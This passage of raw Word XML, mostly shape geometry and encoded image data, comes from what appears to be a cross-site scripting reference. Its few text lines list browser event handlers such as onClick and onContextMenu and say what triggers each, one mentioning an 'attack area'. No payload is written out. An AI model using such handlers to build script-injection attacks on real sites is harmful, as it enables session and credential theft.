                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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" name="Text Box 111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onChange()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5" o:spid="_x0000_s1317" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:45.6pt;height:9.15pt;z-index:-17637376;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1117" o:spid="_x0000_s1318" style="position:absolute;left:1930;top:166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l/sIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9L/gPywi+1U0ErUZXEWm1BUG8fMCQHbPB&#10;7GySXTX9+26h0Lc5nOssVp2txINaXzpWkA4TEMS50yUXCi7nj9cpCB+QNVaOScE3eVgtey8LzLR7&#10;8pEep1CIGMI+QwUmhDqT0ueGLPqhq4kjd3WtxRBhW0jd4jOG20qOkmQiLZYcGwzWtDGU3053q6DZ&#10;Hkri3fuoabx7O+d7Y75mnVKDfreegwjUhX/xn/tTx/lpOobfb+IJ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ZqX+wgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,348;21,348;18,348;0,327;0,324;0,187;21,166;890,166;912,187;912,327;894,348;890,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1116" o:spid="_x0000_s1319" type="#_x0000_t202" style="position:absolute;left:1930;top:166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XFF8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96SYeQpu6EZEKglAa00OP0+wk&#10;WczOxuyq6b/vFgq9zeN9znoz2V7caPTGsYJ0mYAgrp023Cr4qPaLJxA+IGvsHZOCb/KwKR5ma8y1&#10;u3NJt1NoRQxhn6OCLoQhl9LXHVn0SzcQR65xo8UQ4dhKPeI9htterpIkkxYNx4YOB9p1VJ9PV6tg&#10;+8nlq7m8fb2XTWmq6jnhY3ZW6nE+bV9ABJrCv/jPfdBxfppm8PtNPEE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FxRf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onChange()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(select,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>TEXTAREA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>loses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>modified)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:ind w:left="1336" w:hanging="1147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7961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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1111" name="Group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154"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1112" name="Freeform 1114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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827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Text Box 111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onClick()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2" o:spid="_x0000_s1320" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:41.35pt;height:9.15pt;z-index:-17636864;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1114" o:spid="_x0000_s1321" style="position:absolute;left:1930;top:154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XeYsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywheSt0kh1JTN6Itoode1CA5Dtkx&#10;CcnOhuyq8d+7hUJv83ifs1yNphM3GlxjWUE8j0AQl1Y3XCnIT9u3DxDOI2vsLJOCBzlYZZOXJaba&#10;3vlAt6OvRAhhl6KC2vs+ldKVNRl0c9sTB+5iB4M+wKGSesB7CDedTKLoXRpsODTU2NNXTWV7vBoF&#10;P5vvarE973whk3zx2hYb1OVBqdl0XH+C8DT6f/Gfe6/D/DhO4PebcILM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13mLEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,336;21,336;18,336;0,315;0,312;0,175;21,154;805,154;826,175;826,315;809,336;805,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1113" o:spid="_x0000_s1322" type="#_x0000_t202" style="position:absolute;left:1930;top:154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Jmj8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedJMWpEZXEbFQKBRjPHgcs2Oy&#10;mJ2N2a2m/74rFLzN433OYtXbRtyo88axgnSSgCAunTZcKTgUH+N3ED4ga2wck4Jf8rBaDgcLzLS7&#10;c063fahEDGGfoYI6hDaT0pc1WfQT1xJH7uw6iyHCrpK6w3sMt418TZKptGg4NtTY0qam8rL/sQrW&#10;R8635vp92uXn3BTFLOGv6UWpl1G/noMI1Ien+N/9qeP8NH2D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Jmj8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onClick()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  <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(someone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clicks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on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a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form)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1842" w:hanging="1653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012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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1108" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1109" name="Freeform 1111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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 349 167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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 111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133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onContextMenu()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9" o:spid="_x0000_s1323" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:66.85pt;height:9.15pt;z-index:-17636352;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="133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">
                <v:shape id="Freeform 1111" o:spid="_x0000_s1324" style="position:absolute;left:1930;top:167;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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sz+8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS8iG7Sg9XUVVqrIPQgTUXwNmSn&#10;ybbZ2ZBdNfrr3ULB2zze58wWna3FiVpvHCtIRwkI4sJpw6WC3dd6OAHhA7LG2jEpuJCHxfyhN8NM&#10;uzN/0ikPpYgh7DNUUIXQZFL6oiKLfuQa4sh9u9ZiiLAtpW7xHMNtLZ+SZCwtGo4NFTa0rKj4zY9W&#10;weqw36Xm56N7Lpf51kwug+vbOynVf+xeX0AE6sJd/O/e6Dg/Tabw9008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Nsz+8YAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,349;21,349;18,349;0,328;0,325;0,188;21,167;1316,167;1337,188;1337,328;1319,349;1316,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1110" o:spid="_x0000_s1325" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:133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4+MYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UKvdVNPIimriKlQqEgjfHQ4zQ7&#10;JovZ2TS71fjvOwfB2wzvzXvfLNej79SZhugCG8gnGSjiOljHjYFDtX2Zg4oJ2WIXmAxcKcJ69fiw&#10;xMKGC5d03qdGSQjHAg20KfWF1rFuyWOchJ5YtGMYPCZZh0bbAS8S7js9zbKZ9uhYGlrs6a2l+rT/&#10;8wY231y+u9/dz1d5LF1VLTL+nJ2MeX4aN6+gEo3pbr5df1jBz3Phl29kBL3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D4+M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onContextMenu()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>area)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2010"/>
          <w:tab w:val="left" w:pos="2011"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="2010" w:hanging="1821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064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949325" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1105" name="Group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9325" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1495" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1106" name="Freeform 1108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1495" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3404 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1495"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1495"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1495"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1495"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1495"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1495"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1495"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3404 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1495"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3425 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1495"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3425 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1495"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3407 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1495"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3404 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1495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95" h="183">
                                <a:moveTo>
                                  <a:pt x="147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474" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1477" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="147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Text Box 110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149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onControlSelect()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6" o:spid="_x0000_s1326" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:74.75pt;height:9.15pt;z-index:-17635840;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="149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">
                <v:shape id="Freeform 1108" o:spid="_x0000_s1327" style="position:absolute;left:1930;top:166;width:1495;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="149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kBVcEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/wfwgl7kZlYUUZtKmMg26s62OvRnE2x&#10;uZQma7v99ctA8O0+vp9XHCbXioH60HjWsF4pEMSVNw3XGj4vx+cXECEiG2w9k4YfCnAo57MCc+NH&#10;PtFwjrVIIRxy1GBj7HIpQ2XJYVj5jjhxV987jAn2tTQ9jinctTJTaicdNpwaLHb0Zqm6nb+dhuX2&#10;d5Ndh2NXWeRGjYa/6uxd66fF9LoHEWmKD/Hd/WHS/LXawf836QRZ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ZAVXBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1474,182l21,182r-3,l,161r,-3l,21,21,,1474,r21,21l1495,161r-18,21l1474,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1474,348;21,348;18,348;0,327;0,324;0,187;21,166;1474,166;1495,187;1495,327;1477,348;1474,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1107" o:spid="_x0000_s1328" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:149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D2UcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYYTeNLEH265GkdKCUBDX7cHjuBl3&#10;g5vJdhN1/feNUPA2j/c582XvGnGhLljPGiZjBYK49MZypeGn+Bq9gQgR2WDjmTTcKMBy8TSYY2b8&#10;lXO67GIlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0HV5TuGvki1JT6dByaqixpY+aytPu7DSs&#10;9px/2t/NYZsfc1sU74q/pyetn4f9agYiUh8f4n/32qT5E/UK92/SC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D2U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onControlSelect()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115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321310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1102" name="Group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506"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1103" name="Freeform 1105"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="506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689 506"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 689 506"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 688 506"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 668 506"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 664 506"/>
                              <a:gd name="T19" fmla="*/ 664 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 527 506"/>
                              <a:gd name="T23" fmla="*/ 527 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 506 506"/>
                              <a:gd name="T27" fmla="*/ 506 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 506 506"/>
                              <a:gd name="T31" fmla="*/ 506 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
